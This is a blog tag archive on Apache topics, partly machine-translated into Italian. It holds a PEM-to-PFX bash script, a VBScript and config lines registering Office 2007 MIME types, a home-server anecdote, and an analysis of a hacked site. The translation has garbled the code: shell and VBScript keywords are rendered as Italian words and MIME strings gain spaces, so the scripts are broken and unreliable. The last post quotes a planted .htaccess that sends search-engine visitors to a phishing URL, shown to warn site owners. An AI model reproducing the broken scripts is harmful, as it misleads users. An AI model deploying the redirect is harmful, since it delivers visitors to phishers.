Tag-Archive for » apache «

Mercoledì, 18 Marzo, 2009 | Autore:

[modifica] Così tanto per quello. Si scopre che openssl è in grado di determinare che la chiave e il certificato sono già in un unico file. Pertanto, no csplitting richiesto (bene, Spero che qualcuno leggendo questo almeno imparato a conoscere che bello csplit è). Infatti, l'intero script potrebbe anche essere obsolete… blaargh. Bene, almeno dà un bel avvertimento di non dare una passphrase vuota. 😀

Ecco la nuova versione:

pem2pfx – converte un file. PEM formattato contenente una chiave privata e il certificato firmato in un file di certificato compatibile con Windows. pfx.

#!/bin/bash
#pem2pfx
#v0.2
#Difficile - brendan@swiftspirit.co.za
# Converte un file di certificato. Pem al formato. Pfx
# $1 è il file di origine
set -e
 
se [ $# = 1 ]; allora
  outputfile=`echo $1 | ma 'S / .pem $ /. Pfx /'`
 
  echo "Si prega di specificare una password di sotto. Di Windows si rifiuta di importare un certificato PFX. Con una password vuota."
  openssl pkcs12 -esportazione -fuori $outputfile -in $1
 
 altro
  echo "Pem2pfx - converte un. PEM formattato chiave privata e file di certificato in un file PFX compatibile con IIS.."
  echo "Utilizzo: pem2pfx inputfile.pem"
essere

di più…

Condividere
Sabato, 21 Febbraio, 2009 | Autore:

I relativamente nuovi tipi di documenti Ufficio 2007 ha dato alcuni problemi di host web quando i loro clienti vogliono offrire i documenti per il download. Il più delle volte, i documenti vengono offerti dal server web come “text / html” che viene poi reso come una tonnellata di spazzatura sullo schermo dell'utente web.

Il modo migliore per risolvere il problema è quello di aggiungere tutte le MIME tipi di configurazione principale del server. IIS7 per Windows ha già questi tipi MIME impostati correttamente per default. IIS6 e IIS5 richiedono i tipi MIME da aggiungere, come potrebbe Apache su vecchi impianti. Per Apache, vi è anche una soluzione per il proprietario del dominio individuale per aggiungere i tipi MIME tramite Apache .htaccess File.

IIS 6 MIME tipo di aggiunta (per l'Amministratore del server)

Prima che questo può essere fatto, assicurarsi che il server sia impostato anche per consentire la modifica diretta della metabase:

  1. Carico Gestione IIS: Inizio -> RONU, “inetmgr” -> [Bene]
  2. Fare clic destro il “server” e fare clic su “Properties”
  3. All'interno “Internet Information Services” linguetta (di solito l'unica scheda), assicurare che la “Engrado modifiche dirette della metabase” casella è selezionata.
  4. Fare clic [Bene]

Assicurarsi di eseguire il backup della configurazione di IIS (qui per IIS5) in anticipo. Non prenderò alcuna responsabilità per un amministratore rompersi il server di. Ho ragione di credere che questo può lavorare anche su IIS5 però ho tanto motivo di credere che potrebbe solo dare un sacco di errori. Se un IIS5 / Finestre 2000 admin è disposto a provare questo per me dopo il backup la configurazione per favore fatemelo sapere dei risultati.

Copiare il testo riportato di seguito in un file denominato msoff07-addmime.vbs ed eseguirlo una volta dalla riga di comando digitando cscript msoff07-addmime.vbs e premendo Invio. Se si esegue più di una volta, i tipi MIME saranno aggiunti ogni tempo e avrete più voci identiche:

'Questo script aggiunge l'Ufficio necessaria 2007 Tipi MIME per un IIS 6 Server.
'Per utilizzare questo script, basta fare doppio-clic o eseguirlo dalla riga di comando.
'Esecuzione di questo script più volte risultati a più voci in
'IIS MimeMap quindi non dovreste correre più di una volta.
'Modificato da http://msdn.microsoft.com/en-us/library/ms752346.aspx
 
No MimeMapObj, MimeMapArray, MimeTypesToAddArray, WshShell, oExec
Const ADS_PROPERTY_UPDATE = 2 
 
'Impostare i tipi MIME da aggiungere
MimeTypesToAddArray = Schiera(".docm", "application / vnd.ms-word.document.macroEnabled.12", _
"Docx", "Application / vnd.openxmlformats-officedocument.wordprocessingml.document", _
".dotm", "application / vnd.ms-word.template.macroEnabled.12", _
"Dotx", "Application / vnd.openxmlformats-officedocument.wordprocessingml.template", _
"Potm", "Application / vnd.ms-powerpoint.template.macroEnabled.12", _
".potx", "Application / vnd.openxmlformats-officedocument.presentationml.template", _
".ppam", "Application / vnd.ms-powerpoint.addin.macroEnabled.12", _
".ppsm", "Application / vnd.ms-powerpoint.slideshow.macroEnabled.12", _
".ppsx", "Application / vnd.openxmlformats-officedocument.presentationml.slideshow", _
".pptm", "Application / vnd.ms-powerpoint.presentation.macroEnabled.12", _
".pptx", "Application / vnd.openxmlformats-officedocument.presentationml.presentation", _
".sldm", "Application / vnd.ms-powerpoint.slide.macroEnabled.12", _
".sldx", "Application / vnd.openxmlformats-officedocument.presentationml.slide", _
".xlam", "application / vnd.ms-excel.addin.macroEnabled.12", _
".xlsb", "application / vnd.ms-excel.sheet.binary.macroEnabled.12", _
".xlsm", "application / vnd.ms-excel.sheet.macroEnabled.12", _
".xlsx", "Application / vnd.openxmlformats-officedocument.spreadsheetml.sheet", _
".xltm", "application / vnd.ms-excel.template.macroEnabled.12", _
".xltx", "Application / vnd.openxmlformats-officedocument.spreadsheetml.template") 
 
'Prendi l'oggetto MimeMap
Set MimeMapObj = GetObject("IIS://Localhost / MimeMap")
 
'Chiama AddMimeType per ogni coppia di estensione / tipo MIME
Per contatore = 0 a UBound(MimeTypesToAddArray) Passo 2
    AddMimeType MimeTypesToAddArray(contatore), MimeTypesToAddArray(contatore+1)
Prossimo
 
'Creare un oggetto Shell
Set WshShell = CreateObject("WScript.Shell")
 
'Interrompere e avviare il servizio di IIS
Set oExec = WshShell.Exec("Net stop w3svc")
Il Mentre oExec.Stato = 0
    WScript.Sonno 100
Anello
 
Set oExec = WshShell.Exec("Net start w3svc")
Il Mentre oExec.Stato = 0
    WScript.Sonno 100
Anello
 
Set oExec = Niente
 
'Rapporto sullo stato di utente
WScript.Echo "Microsoft Office 2007 Sono stati registrati i tipi di documenti MIME."
 
'AddMimeType Sub
Sub AddMimeType (Ext, Mtype)
 
    'Prendi le mappature dalla proprietà MimeMap.
    MimeMapArray = MimeMapObj.GETEX("MimeMap") 
 
    'Aggiungi una nuova mappatura.
    Io = UBound(MimeMapArray) + 1
    Redim Preserve MimeMapArray(Io)
    Set MimeMapArray(Io) = CreateObject("MimeMap")
    MimeMapArray(Io).Estensione = Ext
    MimeMapArray(Io).MimeType = Mtype
    MimeMapObj.PutEx ADS_PROPERTY_UPDATE, "MimeMap", MimeMapArray
    MimeMapObj.SetInfo
 
Fine Sub

Apache MIME tipo di aggiunta (per l'Amministratore del server)

Apache memorizza i suoi tipi MIME in un file normalmente si trova in $InstallPath / conf / mime.types. Vedere il mod_mime documentazione per maggiori informazioni su come funziona. Arch Linux installa i suoi tipi MIME in /etc / httpd / conf / mime.types e Parallels Plesk lo installa in /usr / / psa / admin / conf / mime.types locali. La vostra distribuzione potrebbe avere in un altro luogo, in modo da trovare la vostra mime.types file eseguendo individuare mime.types.

Aggiungere le seguenti righe al file mime.types:

application/vnd.ms-word.document.macroEnabled.12                          docm
application/vnd.openxmlformats-officedocument.wordprocessingml.document   docx
application/vnd.ms-word.template.macroEnabled.12                          dotm
application/vnd.openxmlformats-officedocument.wordprocessingml.template   dotx
application/vnd.ms-powerpoint.template.macroEnabled.12                    potm
application/vnd.openxmlformats-officedocument.presentationml.template     potx
application/vnd.ms-powerpoint.addin.macroEnabled.12                       ppam
application/vnd.ms-powerpoint.slideshow.macroEnabled.12                   ppsm
application/vnd.openxmlformats-officedocument.presentationml.slideshow    ppsx
application/vnd.ms-powerpoint.presentation.macroEnabled.12                pptm
application/vnd.openxmlformats-officedocument.presentationml.presentation pptx
application/vnd.ms-powerpoint.slide.macroEnabled.12                       sldm
application/vnd.openxmlformats-officedocument.presentationml.slide        sldx
application/vnd.ms-excel.addin.macroEnabled.12                            xlam
application/vnd.ms-excel.sheet.binary.macroEnabled.12                     xlsb
application/vnd.ms-excel.sheet.macroEnabled.12                            xlsm
application/vnd.openxmlformats-officedocument.spreadsheetml.sheet         xlsx
application/vnd.ms-excel.template.macroEnabled.12                         xltm
application/vnd.openxmlformats-officedocument.spreadsheetml.template      xltx

Apache MIME tipo di aggiunta (Per il proprietario del dominio con almeno FTP accesso – utilizzando il file htaccess)

Aggiungere il seguente testo al dominio di .htaccess File, più comunemente in un httpdocs / elenco

AddType application / vnd.ms-word.document.macroEnabled.12 docm
AddType application / vnd.openxmlformats-officedocument.wordprocessingml.document docx
AddType application / vnd.ms-word.template.macroEnabled.12 dotm
AddType application / vnd.openxmlformats-officedocument.wordprocessingml.template dotx
AddType application / vnd.ms-powerpoint.template.macroEnabled.12 potm
AddType application / vnd.openxmlformats-officedocument.presentationml.template potx
AddType application / vnd.ms-powerpoint.addin.macroEnabled.12 ppam
AddType application / vnd.ms-powerpoint.slideshow.macroEnabled.12 RSPP
AddType application / vnd.openxmlformats-officedocument.presentationml.slideshow PPSX
AddType application / vnd.ms-powerpoint.presentation.macroEnabled.12 pptm
AddType application / vnd.openxmlformats-officedocument.presentationml.presentation pptx
AddType application / vnd.ms-powerpoint.slide.macroEnabled.12 sldm
AddType application / vnd.openxmlformats-officedocument.presentationml.slide sldx
AddType application / vnd.ms-excel.addin.macroEnabled.12 xlam
AddType application / vnd.ms-excel.sheet.binary.macroEnabled.12 XLSB
AddType application / vnd.ms-excel.sheet.macroEnabled.12 xlsm
AddType application / vnd.openxmlformats-officedocument.spreadsheetml.sheet xlsx
AddType application / vnd.ms-excel.template.macroEnabled.12 XLTM
AddType application / vnd.openxmlformats-officedocument.spreadsheetml.template xltx
Condividere
Tuesday, February 17th, 2009 | Autore:

Some of you may already know that I built a home server not too long ago. I documented some of the very important parts of how it was built though I was planning on releasing all the documentation all at once. I was using Arch Linux and I hadn’t nearly finished everything, especially the documentation. Per esempio, it was supposed to be a media server. After some disk shuffling, it was supposed to end up having a RAID1 for the boot and RAID 10 for the rest (the media part).

This didn’t work out at all.

I got as far as having an efficient (e benefirewalled) routing gateway server. I was finally satisfied that the customised local routing* was working correctly and I was confident that my tests with DHCP meant I could disable the DHCP service on the flimsy ADSL router and have all my flatmates start using the server as the Internet porta. Instead: I was logged in to the server from the office, I’d just installed Apache2**, and I was about to consult with a colleague regarding getting nice graphs put together so the flatmates could all see who was using up the bandwidth***when I noticed a little message indicating that the root filesystem had been remounted read-only due to some or other disk failure.

And then I lost my connection to the server.

And then I gained a foul mood.

🙁

When I arrived home, I found that, as I had guessed from the descriptive message given at the office, il (molto) old 80GB IDE disk that I was using for the root filesystem had failed. Unfortunately, the server would never boot again and there was little chance of prying everything off onto another disk to continue where I’d left off.

I’m buying a replacement (SATA) HDD this next weekend just after pay dayand I’ve changed my mind about documenting my progressand backing up my configurations:

Release Early. Release Often.

* ISPs in South Africa charge less (easy price comparison) per “local-only” (within South Africa) traffic on ADSL but only if you use an ADSL account that CANNOT access web services outside of South Africa. This means that if you want to take advantage of the reduced costs but still be able to access the Internet at large, you need to set up some sneaky routing.

** one-command-install: ~$ yaourt -S apache

*** Internet Access in SA is expensiveyou get charged about R70 ($7 / £4.9 / €5.46) per GB when using ADSL, or about R2 per MB if using GPRS / 3G.

Condividere
Thursday, January 22nd, 2009 | Autore:

I very recently found a problem with a client’s web site due to a .htaccess File. The site was hosted on a Finestre server running IIS using IISPassword, which makes use of .htaccess files for its settings.

IISPassword doesn’t follow exactly the same rules as with Apache tuttavia. If the .htaccess file exists then it must contain IISPassword-appropriate rules, otherwise the server returns only the following error:

Error 500 given by IIS Password
Here’s the content of the .htaccess file. I’ve only modified the final redirection URL to point to example.com appropriately:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://siffy-phishing-url.example.com [R,L]

If this were on a server running Apache with mod_rewrite, most web users would go directly to the correct site content. Only if they reached the site through the search engines and indexes listed in the .htaccess, would they be redirected to the siffy phishing url that the cracker wants victims to reach.

Naturalmente, the cracker (or perhaps even an automated worm) didn’t realise that the server in question didn’t even support these mod_rewrite rules. But either way, this is very worrying as I can foresee many arguments about whether or not the site is working

Condividere